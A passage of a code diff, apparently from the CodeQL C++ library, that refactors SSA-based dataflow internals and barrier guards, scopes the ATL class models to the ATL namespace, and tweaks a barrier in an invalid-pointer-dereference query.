bb1, IRBlock bb2 | + Ssa::ssaFlow(n, succ) and + bb1 = n.getBasicBlock() and + bb2 = succ.getBasicBlock() and + bb1 != bb2 and + bb2.dominates(bb1) and + bb1.getASuccessor+() = bb2 + ) + } + /** * Holds if data flows from `nodeFrom` to `nodeTo` in exactly one local * (intra-procedural) step. This relation is only used for local dataflow @@ -1821,15 +1815,9 @@ private module Cached { cached predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { ( - // Post update node -> Node flow - Ssa::postUpdateFlow(nodeFrom, nodeTo) - or // Def-use/Use-use flow Ssa::ssaFlow(nodeFrom, nodeTo) or - // Phi input -> Phi - nodeFrom.(SsaPhiInputNode).getPhiNode() = nodeTo.(SsaPhiNode).getPhiNode() - or IteratorFlow::localFlowStep(nodeFrom, nodeTo) or // Operand -> Instruction flow @@ -1844,9 +1832,6 @@ private module Cached { not iFrom = Ssa::getIRRepresentationOfOperand(opTo) ) or - // Phi node -> Node flow - Ssa::fromPhiNode(nodeFrom, nodeTo) - or // Indirect operand -> (indirect) instruction flow indirectionOperandFlow(nodeFrom, nodeTo) or @@ -2290,22 +2275,6 @@ class ContentSet instanceof Content { } } -pragma[nomagic] -private predicate guardControlsPhiInput( - IRGuardCondition g, boolean branch, Ssa::DefinitionExt def, IRBlock input, Ssa::PhiNode phi -) { - phi.hasInputFromBlock(def, _, _, _, input) and - ( - g.controls(input, branch) - or - exists(EdgeKind kind | - g.getBlock() = input and - kind = getConditionalEdge(branch) and - input.getSuccessor(kind) = phi.getBasicBlock() - ) - ) -} - /** * Holds if the guard `g` validates the expression `e` upon evaluating to `branch`. * @@ -2337,6 +2306,10 @@ module BarrierGuard { ) } + private predicate guardChecksNode(IRGuardCondition g, Node n, boolean branch) { + guardChecks(g, n.asOperand().getDef().getConvertedResultExpression(), branch) + } + /** * Gets an expression node that is safely guarded by the given guard check. * @@ -2377,14 +2350,7 @@ module BarrierGuard { controls(g, result, edge) ) or - exists( - IRGuardCondition g, boolean branch, Ssa::DefinitionExt def, IRBlock input, Ssa::PhiNode phi - | - guardChecks(g, def.getARead().asOperand().getDef().getConvertedResultExpression(), branch) and - guardControlsPhiInput(g, branch, def, pragma[only_bind_into](input), - pragma[only_bind_into](phi)) and - result = TSsaPhiInputNode(phi, input) - ) + result = Ssa::BarrierGuard::getABarrierNode() } /** @@ -2433,6 +2399,13 @@ module BarrierGuard { ) } + private predicate guardChecksIndirectNode( + IRGuardCondition g, Node n, boolean branch, int indirectionIndex + ) { + guardChecks(g, n.asIndirectOperand(indirectionIndex).getDef().getConvertedResultExpression(), + branch) + } + /** * Gets an indirect expression node with indirection index `indirectionIndex` that is * safely guarded by the given guard check. @@ -2475,16 +2448,8 @@ module BarrierGuard { controls(g, result, edge) ) or - exists( - IRGuardCondition g, boolean branch, Ssa::DefinitionExt def, IRBlock input, Ssa::PhiNode phi - | - guardChecks(g, - def.getARead().asIndirectOperand(indirectionIndex).getDef().getConvertedResultExpression(), - branch) and - guardControlsPhiInput(g, branch, def, pragma[only_bind_into](input), - pragma[only_bind_into](phi)) and - result = TSsaPhiInputNode(phi, input) - ) + result = + Ssa::BarrierGuardWithIntParam::getABarrierNode(indirectionIndex) } } @@ -2493,14 +2458,6 @@ module BarrierGuard { */ signature predicate instructionGuardChecksSig(IRGuardCondition g, Instruction instr, boolean branch); -private EdgeKind getConditionalEdge(boolean branch) { - branch = true and - result instanceof TrueEdge - or - branch = false and - result instanceof FalseEdge -} - /** * Provides a set of barrier nodes for a guard that validates an instruction. * @@ -2517,6 +2474,10 @@ module InstructionBarrierGuard::getABarrierNode() } bindingset[value, n] @@ -2544,6 +2498,12 @@ module InstructionBarrierGuard::getABarrierNode(indirectionIndex) } } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternals.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternals.qll index 77e6e8590cef..202d3fa32c80 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternals.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternals.qll @@ -2,6 +2,7 @@ private import codeql.ssa.Ssa as SsaImplCommon private import semmle.code.cpp.ir.IR private import DataFlowUtil private import DataFlowImplCommon as DataFlowImplCommon +private import semmle.code.cpp.controlflow.IRGuards as IRGuards private import semmle.code.cpp.models.interfaces.Allocation as Alloc private import semmle.code.cpp.models.interfaces.DataFlow as DataFlow private import semmle.code.cpp.models.interfaces.Taint as Taint @@ -464,6 +465,17 @@ private predicate finalParameterNodeHasParameterAndIndex( n.getIndirectionIndex() = indirectionIndex } +pragma[nomagic] +private predicate hasReturnPosition(IRFunction f, IRBlock block, int index) { + exists(Instruction return | + return instanceof ReturnInstruction or + return instanceof UnreachedInstruction + | + block.getInstruction(index) = return and + return.getEnclosingIRFunction() = f + ) +} + class FinalParameterUse extends UseImpl, TFinalParameterUse { Parameter p; @@ -492,12 +504,9 @@ class FinalParameterUse extends UseImpl, TFinalParameterUse { // `UnreachedInstruction`. If that's the case this predicate will // return multiple results. I don't think this is detrimental to // performance, however. - exists(Instruction return | - return instanceof ReturnInstruction or - return instanceof UnreachedInstruction - | - block.getInstruction(index) = return and - return.getEnclosingFunction() = p.getFunction() + exists(IRFunction f | + hasReturnPosition(f, block, index) and + f.getFunction() = p.getFunction() ) } @@ -587,13 +596,7 @@ class GlobalUse extends UseImpl, TGlobalUse { // globals at any exit so that we can flow out of non-returning functions. // Obviously this isn't correct as we can't actually flow but the global flow // requires this if we want to flow into children. - exists(Instruction return | - return instanceof ReturnInstruction or - return instanceof UnreachedInstruction - | - block.getInstruction(index) = return and - return.getEnclosingIRFunction() = f - ) + hasReturnPosition(f, block, index) } override BaseSourceVariable getBaseSourceVariable() { @@ -669,21 +672,6 @@ class GlobalDefImpl extends DefImpl, TGlobalDefImpl { override Location getLocation() { result = f.getLocation() } } -/** - * Holds if there is a definition or access at index `i1` in basic block `bb1` - * and the next subsequent read is at index `i2` in basic block `bb2`. - */ -predicate adjacentDefRead(IRBlock bb1, int i1, SourceVariable sv, IRBlock bb2, int i2) { - adjacentDefReadExt(_, sv, bb1, i1, bb2, i2) -} - -predicate useToNode(IRBlock bb, int i, SourceVariable sv, Node nodeTo) { - exists(UseImpl use | - use.hasIndexInBlock(bb, i, sv) and - nodeTo = use.getNode() - ) -} - pragma[noinline] predicate outNodeHasAddressAndIndex( IndirectArgumentOutNode out, Operand address, int indirectionIndex @@ -697,34 +685,17 @@ predicate outNodeHasAddressAndIndex( * * Holds if `node` is the node that corresponds to the definition of `def`. */ -predicate defToNode( - Node node, DefinitionExt def, SourceVariable sv, IRBlock bb, int i, boolean uncertain -) { - def.definesAt(sv, bb, i, _) and - ( - nodeHasOperand(node, def.getValue().asOperand(), def.getIndirectionIndex()) - or - nodeHasInstruction(node, def.getValue().asInstruction(), def.getIndirectionIndex()) - or - node.(InitialGlobalValue).getGlobalDef() = def - ) and - if def.isCertain() then uncertain = false else uncertain = true +predicate defToNode(Node node, Definition def, SourceVariable sv) { + def.getSourceVariable() = sv and + defToNode(node, def) } -/** - * INTERNAL: Do not use. - * - * Holds if `node` is the node that corresponds to the definition or use at - * index `i` in block `bb` of `sv`. - * - * `uncertain` is `true` if this is an uncertain definition. - */ -predicate nodeToDefOrUse(Node node, SourceVariable sv, IRBlock bb, int i, boolean uncertain) { - defToNode(node, _, sv, bb, i, uncertain) +private predicate defToNode(Node node, Definition def) { + nodeHasOperand(node, def.getValue().asOperand(), def.getIndirectionIndex()) or - // Node -> Use - useToNode(bb, i, sv, node) and - uncertain = false + nodeHasInstruction(node, def.getValue().asInstruction(), def.getIndirectionIndex()) + or + node.(InitialGlobalValue).getGlobalDef() = def } /** @@ -732,10 +703,7 @@ predicate nodeToDefOrUse(Node node, SourceVariable sv, IRBlock bb, int i, boolea * only holds when there is no use-use relation out of `nTo`. */ private predicate indirectConversionFlowStep(Node nFrom, Node nTo) { - not exists(SourceVariable sv, IRBlock bb2, int i2 | - useToNode(bb2, i2, sv, nTo) and - adjacentDefRead(bb2, i2, sv, _, _) - ) and + not ssaFlowImpl(nTo, _) and exists(Operand op1, Operand op2, int indirectionIndex, Instruction instr | hasOperandAndIndex(nFrom, op1, pragma[only_bind_into](indirectionIndex)) and hasOperandAndIndex(nTo, op2, pragma[only_bind_into](indirectionIndex)) and @@ -744,50 +712,6 @@ private predicate indirectConversionFlowStep(Node nFrom, Node nTo) { ) } -/** - * Holds if `node` is a phi input node that should receive flow from the - * definition to (or use of) `sv` at `(bb1, i1)`. - */ -private predicate phiToNode(SsaPhiInputNode node, SourceVariable sv, IRBlock bb1, int i1) { - exists(PhiNode phi, IRBlock input | - phi.hasInputFromBlock(_, sv, bb1, i1, input) and - node.getPhiNode() = phi and - node.getBlock() = input - ) -} - -/** - * Holds if there should be flow from `nodeFrom` to `nodeTo` because - * `nodeFrom` is a definition or use of `sv` at index `i1` at basic - * block `bb1`. - * - * `uncertain` is `true` if `(bb1, i1)` is a definition, and that definition - * is _not_ guaranteed to overwrite the entire allocation. - */ -private predicate ssaFlowImpl( - IRBlock bb1, int i1, SourceVariable sv, Node nodeFrom, Node nodeTo, boolean uncertain -) { - nodeToDefOrUse(nodeFrom, sv, bb1, i1, uncertain) and - ( - exists(IRBlock bb2, int i2 | - adjacentDefRead(bb1, i1, sv, bb2, i2) and - useToNode(bb2, i2, sv, nodeTo) - ) - or - phiToNode(nodeTo, sv, bb1, i1) - ) and - nodeFrom != nodeTo -} - -/** Gets a node that represents the prior definition of `node`. */ -private Node getAPriorDefinition(DefinitionExt next) { - exists(IRBlock bb, int i, SourceVariable sv | - lastRefRedefExt(_, pragma[only_bind_into](sv), pragma[only_bind_into](bb), - pragma[only_bind_into](i), _, next) and - nodeToDefOrUse(result, sv, bb, i, _) - ) -} - private predicate inOut(FIO::FunctionInput input, FIO::FunctionOutput output) { exists(int indirectionIndex | input.isQualifierObject(indirectionIndex) and @@ -834,21 +758,6 @@ private predicate modeledFlowBarrier(Node n) { ) } -/** Holds if there is def-use or use-use flow from `nodeFrom` to `nodeTo`. */ -predicate ssaFlow(Node nodeFrom, Node nodeTo) { - exists(Node nFrom, boolean uncertain, IRBlock bb, int i, SourceVariable sv | - ssaFlowImpl(bb, i, sv, nFrom, nodeTo, uncertain) and - not modeledFlowBarrier(nFrom) and - nodeFrom != nodeTo - | - if uncertain = true - then - nodeFrom = - [nFrom, getAPriorDefinition(any(DefinitionExt next | next.definesAt(sv, bb, i, _)))] - else nodeFrom = nFrom - ) -} - private predicate isArgumentOfCallableInstruction(DataFlowCall call, Instruction instr) { isArgumentOfCallableOperand(call, unique( | | getAUse(instr))) } @@ -905,22 +814,15 @@ private predicate postUpdateNodeToFirstUse(PostUpdateNode pun, Node n) { // So this predicate recurses back along conversions and `PointerArithmetic` // instructions to find the first use that has provides use-use flow, and // uses that target as the target of the `nodeFrom`. - exists(Node adjusted, IRBlock bb1, int i1, SourceVariable sv | + exists(Node adjusted | indirectConversionFlowStep*(adjusted, pun.getPreUpdateNode()) and - useToNode(bb1, i1, sv, adjusted) - | - exists(IRBlock bb2, int i2 | - adjacentDefRead(bb1, i1, sv, bb2, i2) and - useToNode(bb2, i2, sv, n) - ) - or - phiToNode(n, sv, bb1, i1) + ssaFlowImpl(adjusted, n) ) } private predicate stepUntilNotInCall(DataFlowCall call, Node n1, Node n2) { isArgumentOfCallable(call, n1) and - exists(Node mid | ssaFlowImpl(_, _, _, n1, mid, _) | + exists(Node mid | ssaFlowImpl(n1, mid) | isArgumentOfCallable(call, mid) and stepUntilNotInCall(call, mid, n2) or @@ -952,7 +854,7 @@ private predicate isArgumentOfSameCall(DataFlowCall call, Node n1, Node n2) { * similarly we want flow from the second argument of `write_first_argument` to `x` * on the next line. */ -predicate postUpdateFlow(PostUpdateNode pun, Node nodeTo) { +private predicate postUpdateFlow(PostUpdateNode pun, Node nodeTo) { exists(Node preUpdate, Node mid | preUpdate = pun.getPreUpdateNode() and postUpdateNodeToFirstUse(pun, mid) @@ -967,21 +869,6 @@ predicate postUpdateFlow(PostUpdateNode pun, Node nodeTo) { ) } -/** Holds if `nodeTo` receives flow from the phi node `nodeFrom`. */ -predicate fromPhiNode(SsaPhiNode nodeFrom, Node nodeTo) { - exists(PhiNode phi, SourceVariable sv, IRBlock bb1, int i1 | - phi = nodeFrom.getPhiNode() and - phi.definesAt(sv, bb1, i1, _) - | - exists(IRBlock bb2, int i2 | - adjacentDefRead(bb1, i1, sv, bb2, i2) and - useToNode(bb2, i2, sv, nodeTo) - ) - or - phiToNode(nodeTo, sv, bb1, i1) - ) -} - private predicate baseSourceVariableIsGlobal( BaseIRVariable base, GlobalLikeVariable global, IRFunction func ) { @@ -1023,11 +910,6 @@ private module SsaInput implements SsaImplCommon::InputSig { exists(UseImpl use | use.hasIndexInBlock(bb, i, v) | if use.isCertain() then certain = true else certain = false ) - or - exists(GlobalUse global | - global.hasIndexInBlock(bb, i, v) and - certain = true - ) } } @@ -1036,42 +918,14 @@ private module SsaInput implements SsaImplCommon::InputSig { */ cached module SsaCached { - /** - * Holds if `def` is accessed at index `i1` in basic block `bb1` (either a read - * or a write), `def` is read at index `i2` in basic block `bb2`, and there is a - * path between them without any read of `def`. - */ - cached - predicate adjacentDefReadExt( - DefinitionExt def, SourceVariable sv, IRBlock bb1, int i1, IRBlock bb2, int i2 - ) { - SsaImpl::adjacentDefReadExt(def, sv, bb1, i1, bb2, i2) - } - - /** - * Holds if the node at index `i` in `bb` is a last reference to SSA definition - * `def`. The reference is last because it can reach another write `next`, - * without passing through another read or write. - * - * The path from node `i` in `bb` to `next` goes via basic block `input`, - * which is either a predecessor of the basic block of `next`, or `input` = - * `bb` in case `next` occurs in basic block `bb`. - */ cached - predicate lastRefRedefExt( - DefinitionExt def, SourceVariable sv, IRBlock bb, int i, IRBlock input, DefinitionExt next - ) { - SsaImpl::lastRefRedefExt(def, sv, bb, i, input, next) + predicate ssaDefReachesRead(SourceVariable v, Definition def, IRBlock bb, int i) { + SsaImpl::ssaDefReachesRead(v, def, bb, i) } cached - DefinitionExt phiHasInputFromBlockExt(PhiNode phi, IRBlock bb) { - SsaImpl::phiHasInputFromBlockExt(phi, result, bb) - } - - cached - predicate ssaDefReachesReadExt(SourceVariable v, DefinitionExt def, IRBlock bb, int i) { - SsaImpl::ssaDefReachesReadExt(v, def, bb, i) + predicate phiHasInputFromBlock(PhiNode phi, Definition inp, IRBlock bb) { + SsaImpl::phiHasInputFromBlock(phi, inp, bb) } predicate variableRead = SsaInput::variableRead/4; @@ -1080,14 +934,14 @@ module SsaCached { } /** Gets the `DefImpl` corresponding to `def`. */ -private DefImpl getDefImpl(SsaImpl::DefinitionExt def) { +private DefImpl getDefImpl(SsaImpl::Definition def) { exists(SourceVariable sv, IRBlock bb, int i | - def.definesAt(sv, bb, i, _) and + def.definesAt(sv, bb, i) and result.hasIndexInBlock(bb, i, sv) ) } -class GlobalDef extends DefinitionExt { +class GlobalDef extends Definition { GlobalDefImpl impl; GlobalDef() { impl = getDefImpl(this) } @@ -1101,51 +955,167 @@ class GlobalDef extends DefinitionExt { private module SsaImpl = SsaImplCommon::Make; -/** - * An static single assignment (SSA) phi node. - * - * This is either a normal phi node or a phi-read node. - */ -class PhiNode extends SsaImpl::DefinitionExt { - PhiNode() { - this instanceof SsaImpl::PhiNode or - this instanceof SsaImpl::PhiReadNode +private module DataFlowIntegrationInput implements SsaImpl::DataFlowIntegrationInputSig { + class Expr extends Instruction { + Expr() { + exists(IRBlock bb, int i | + variableRead(bb, i, _, true) and + this = bb.getInstruction(i) + ) + } + + predicate hasCfgNode(SsaInput::BasicBlock bb, int i) { bb.getInstruction(i) = this } } - /** - * Holds if this phi node is a phi-read node. - * - * Phi-read nodes are like normal phi nodes, but they are inserted based - * on reads instead of writes. - */ - predicate isPhiRead() { this instanceof SsaImpl::PhiReadNode } + Expr getARead(SsaImpl::Definition def) { + exists(SourceVariable v, IRBlock bb, int i | + ssaDefReachesRead(v, def, bb, i) and + variableRead(bb, i, v, true) and + result.hasCfgNode(bb, i) + ) + } - /** - * Holds if the node at index `i` in `bb` is a last reference to SSA - * definition `def` of `sv`. The reference is last because it can reach - * this phi node, without passing through another read or write. - * - * The path from node `i` in `bb` to this phi node goes via basic block - * `input`, which is either a predecessor of the basic block of this phi - * node, or `input` = `bb` in case this phi node occurs in basic block `bb`. - */ - predicate hasInputFromBlock(DefinitionExt def, SourceVariable sv, IRBlock bb, int i, IRBlock input) { - SsaCached::lastRefRedefExt(def, sv, bb, i, input, this) + predicate ssaDefHasSource(SsaImpl::WriteDefinition def) { none() } + + predicate allowFlowIntoUncertainDef(SsaImpl::UncertainWriteDefinition def) { any() } + + private EdgeKind getConditionalEdge(boolean branch) { + branch = true and + result instanceof TrueEdge + or + branch = false and + result instanceof FalseEdge + } + + class Guard instanceof IRGuards::IRGuardCondition { + string toString() { result = super.toString() } + + predicate controlsBranchEdge(SsaInput::BasicBlock bb1, SsaInput::BasicBlock bb2, boolean branch) { + exists(EdgeKind kind | + super.getBlock() = bb1 and + kind = getConditionalEdge(branch) and + bb1.getSuccessor(kind) = bb2 + ) + } + } + + predicate guardDirectlyControlsBlock(Guard guard, SsaInput::BasicBlock bb, boolean branch) { + guard.(IRGuards::IRGuardCondition).controls(bb, branch) + } + + predicate keepAllPhiInputBackEdges() { any() } +} + +private module DataFlowIntegrationImpl = SsaImpl::DataFlowIntegration; + +class SynthNode extends DataFlowIntegrationImpl::SsaNode { + SynthNode() { not this.asDefinition() instanceof SsaImpl::WriteDefinition } +} + +signature predicate guardChecksNodeSig(IRGuards::IRGuardCondition g, Node e, boolean branch); + +signature predicate guardChecksNodeSig( + IRGuards::IRGuardCondition g, Node e, boolean branch, int indirectionIndex +); + +module BarrierGuardWithIntParam { + private predicate ssaDefReachesCertainUse(Definition def, UseImpl use) { + exists(SourceVariable v, IRBlock bb, int i | + use.hasIndexInBlock(bb, i, v) and + variableRead(bb, i, v, true) and + ssaDefReachesRead(v, def, bb, i) + ) } + private predicate guardChecks( + DataFlowIntegrationInput::Guard g, SsaImpl::Definition def, boolean branch, int indirectionIndex + ) { + exists(UseImpl use | + guardChecksNode(g, use.getNode(), branch, indirectionIndex) and + ssaDefReachesCertainUse(def, use) + ) + } + + Node getABarrierNode(int indirectionIndex) { + // Only get the SynthNodes from the shared implementation, as the ExprNodes cannot + // be matched on SourceVariable. + result.(SsaSynthNode).getSynthNode() = + DataFlowIntegrationImpl::BarrierGuardDefWithState::getABarrierNode(indirectionIndex) + or + // Calculate the guarded UseImpls corresponding to ExprNodes directly. + exists(DataFlowIntegrationInput::Guard g, boolean branch, Definition def, IRBlock bb | + guardChecks(g, def, branch, indirectionIndex) and + exists(UseImpl use | + ssaDefReachesCertainUse(def, use) and + use.getBlock() = bb and + DataFlowIntegrationInput::guardControlsBlock(g, bb, branch) and + result = use.getNode() + ) + ) + } +} + +module BarrierGuard { + private predicate guardChecksNode( + IRGuards::IRGuardCondition g, Node e, boolean branch, int indirectionIndex + ) { + guardChecksNode(g, e, branch) and indirectionIndex = 0 + } + + Node getABarrierNode() { + result = BarrierGuardWithIntParam::getABarrierNode(0) + } +} + +bindingset[result, v] +pragma[inline_late] +DataFlowIntegrationImpl::Node fromDfNode(Node n, SourceVariable v) { + result = n.(SsaSynthNode).getSynthNode() + or + exists(UseImpl use, IRBlock bb, int i | + result.(DataFlowIntegrationImpl::ExprNode).getExpr().hasCfgNode(bb, i) and + use.hasIndexInBlock(bb, i, v) and + use.isCertain() and + use.getNode() = n + ) + or + defToNode(n, result.(DataFlowIntegrationImpl::SsaDefinitionNode).getDefinition()) +} + +private predicate ssaFlowImpl(Node nodeFrom, Node nodeTo) { + exists(SourceVariable v | + nodeFrom != nodeTo and + DataFlowIntegrationImpl::localFlowStep(v, fromDfNode(nodeFrom, v), fromDfNode(nodeTo, v), _) + ) +} + +/** Holds if there is def-use or use-use flow from `nodeFrom` to `nodeTo`. */ +predicate ssaFlow(Node nodeFrom, Node nodeTo) { + postUpdateFlow(nodeFrom, nodeTo) + or + ssaFlowImpl(nodeFrom, nodeTo) and + not modeledFlowBarrier(nodeFrom) +} + +/** + * An static single assignment (SSA) phi node. + */ +class PhiNode extends Definition instanceof SsaImpl::PhiNode { /** Gets a definition that is an input to this phi node. */ - final DefinitionExt getAnInput() { this.hasInputFromBlock(result, _, _, _, _) } + final Definition getAnInput() { phiHasInputFromBlock(this, result, _) } } /** An static single assignment (SSA) definition. */ -class DefinitionExt extends SsaImpl::DefinitionExt { - private DefinitionExt getAPhiInputOrPriorDefinition() { result = this.(PhiNode).getAnInput() } +class Definition extends SsaImpl::Definition { + // TODO: Include prior definitions of uncertain writes or rename predicate + // i.e. the disjunct `SsaImpl::uncertainWriteDefinitionInput(this, result)` + private Definition getAPhiInputOrPriorDefinition() { result = this.(PhiNode).getAnInput() } /** * Gets a definition that ultimately defines this SSA definition and is * not itself a phi node. */ - final DefinitionExt getAnUltimateDefinition() { + final Definition getAnUltimateDefinition() { result = this.getAPhiInputOrPriorDefinition*() and not result instanceof PhiNode } @@ -1180,16 +1150,6 @@ class DefinitionExt extends SsaImpl::DefinitionExt { /** Gets the unspecified type of the variable being defined by this definition. */ Type getUnspecifiedType() { result = this.getUnderlyingType().getUnspecifiedType() } - - /** Gets a node that represents a read of this SSA definition. */ - pragma[nomagic] - Node getARead() { - exists(SourceVariable sv, IRBlock bb, int i | SsaCached::ssaDefReachesReadExt(sv, this, bb, i) | - useToNode(bb, i, sv, result) - or - phiToNode(result, sv, bb, i) - ) - } } import SsaCached diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternalsCommon.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternalsCommon.qll index 5d8a9ebf9a60..617e2be8cc38 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternalsCommon.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/SsaInternalsCommon.qll @@ -630,10 +630,18 @@ private module Cached { Operand operand, int indirectionIndex, Operand operandRepr, int indirectionIndexRepr ) { indirectionIndex = [1 .. countIndirectionsForCppType(getLanguageType(operand))] and - exists(Instruction load | - isDereference(load, operand, false) and - operandRepr = unique( | | getAUse(load)) and - indirectionIndexRepr = indirectionIndex - 1 + ( + exists(Instruction load | + isDereference(load, operand, false) and + operandRepr = unique( | | getAUse(load)) and + indirectionIndexRepr = indirectionIndex - 1 + ) + or + exists(CopyValueInstruction copy | + copy.getSourceValueOperand() = operand and + operandRepr = unique( | | getAUse(copy)) and + indirectionIndexRepr = indirectionIndex + ) ) } @@ -649,11 +657,19 @@ private module Cached { Instruction instr, int indirectionIndex, Instruction instrRepr, int indirectionIndexRepr ) { indirectionIndex = [1 .. countIndirectionsForCppType(getResultLanguageType(instr))] and - exists(Instruction load, Operand address | - address = unique( | | getAUse(instr)) and - isDereference(load, address, false) and - instrRepr = load and - indirectionIndexRepr = indirectionIndex - 1 + ( + exists(Instruction load, Operand address | + address = unique( | | getAUse(instr)) and + isDereference(load, address, false) and + instrRepr = load and + indirectionIndexRepr = indirectionIndex - 1 + ) + or + exists(CopyValueInstruction copy | + copy.getSourceValueOperand() = unique( | | getAUse(instr)) and + instrRepr = copy and + indirectionIndexRepr = indirectionIndex + ) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll index 595b6e3bb3eb..e1f77c957579 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CA2AEX.qll @@ -6,7 +6,7 @@ private import semmle.code.cpp.dataflow.new.DataFlow * The `CA2AEX` (and related) classes from the Windows Active Template library. */ class Ca2Aex extends Class { - Ca2Aex() { this.hasGlobalName(["CA2AEX", "CA2CAEX", "CA2WEX"]) } + Ca2Aex() { this.hasQualifiedName("ATL", ["CA2AEX", "CA2CAEX", "CA2WEX"]) } } private class Ca2AexTaintInheritingContent extends TaintInheritingContent, DataFlow::FieldContent { diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll index 6c01a29c539d..bfb46a1d946a 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll @@ -4,7 +4,7 @@ import semmle.code.cpp.models.interfaces.FlowSource * The `CAtlFile` class from Microsoft's Active Template Library. */ class CAtlFile extends Class { - CAtlFile() { this.hasGlobalName("CAtlFile") } + CAtlFile() { this.hasQualifiedName("ATL", "CAtlFile") } } private class CAtlFileRead extends MemberFunction, LocalFlowSourceFunction { diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll index 85dae06806fb..be0cf4c1be74 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll @@ -4,14 +4,14 @@ import semmle.code.cpp.models.interfaces.FlowSource * The `CAtlFileMapping` class from Microsoft's Active Template Library. */ class CAtlFileMapping extends Class { - CAtlFileMapping() { this.hasGlobalName("CAtlFileMapping") } + CAtlFileMapping() { this.hasQualifiedName("ATL", "CAtlFileMapping") } } /** * The `CAtlFileMappingBase` class from Microsoft's Active Template Library. */ class CAtlFileMappingBase extends Class { - CAtlFileMappingBase() { this.hasGlobalName("CAtlFileMappingBase") } + CAtlFileMappingBase() { this.hasQualifiedName("ATL", "CAtlFileMappingBase") } } private class CAtlFileMappingBaseGetData extends MemberFunction, LocalFlowSourceFunction { diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll index cc3a36d0fbd7..631223acb668 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll @@ -4,7 +4,7 @@ import semmle.code.cpp.models.interfaces.FlowSource * The `CAtlFile` class from Microsoft's Active Template Library. */ class CAtlTemporaryFile extends Class { - CAtlTemporaryFile() { this.hasGlobalName("CAtlTemporaryFile") } + CAtlTemporaryFile() { this.hasQualifiedName("ATL", "CAtlTemporaryFile") } } private class CAtlTemporaryFileRead extends MemberFunction, LocalFlowSourceFunction { diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll index 55d18a52ae45..3580886c4d5a 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll @@ -4,7 +4,7 @@ private import semmle.code.cpp.dataflow.new.DataFlow /** The `CComBSTR` class from the Microsoft "Active Template Library". */ class CcomBstr extends Class { - CcomBstr() { this.hasGlobalName("CComBSTR") } + CcomBstr() { this.hasQualifiedName("ATL", "CComBSTR") } } private class Mstr extends Field { diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll index b2fe3a363c7c..83be2d833124 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll @@ -4,7 +4,7 @@ private import semmle.code.cpp.dataflow.new.DataFlow /** The `CPathT` class from the Microsoft "Active Template Library". */ class CPathT extends Class { - CPathT() { this.hasGlobalName("CPathT") } + CPathT() { this.hasQualifiedName("ATL", "CPathT") } } private class MStrPath extends Field { diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll index e6d1a5ba09ec..db40acb22767 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CRegKey.qll @@ -5,7 +5,7 @@ private import semmle.code.cpp.dataflow.new.DataFlow /** The `CRegKey` class from the Microsoft "Active Template Library". */ class CRegKey extends Class { - CRegKey() { this.hasGlobalName("CRegKey") } + CRegKey() { this.hasQualifiedName("ATL", "CRegKey") } } module CRegKey { diff --git a/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/AllocationToInvalidPointer.qll b/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/AllocationToInvalidPointer.qll index 83017aec3537..223d0abf1d4e 100644 --- a/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/AllocationToInvalidPointer.qll +++ b/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/AllocationToInvalidPointer.qll @@ -327,9 +327,7 @@ private module Config implements ProductFlow::StateConfigSig { predicate isBarrierIn1(DataFlow::Node node) { isSourcePair(node, _, _, _) } - predicate isBarrierOut2(DataFlow::Node node) { - node = any(DataFlow::SsaPhiNode phi).getAnInput(true) - } + predicate isBarrierOut2(DataFlow::Node node) { DataFlow::flowsToBackEdge(node) } } private module AllocToInvalidPointerFlow = ProductFlow::GlobalWithState; diff --git a/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/InvalidPointerToDereference.qll b/cpp/ql/lib/semmle/code/cpp/security/InvalidPointerDereference/InvalidPointerToDereference.qll index 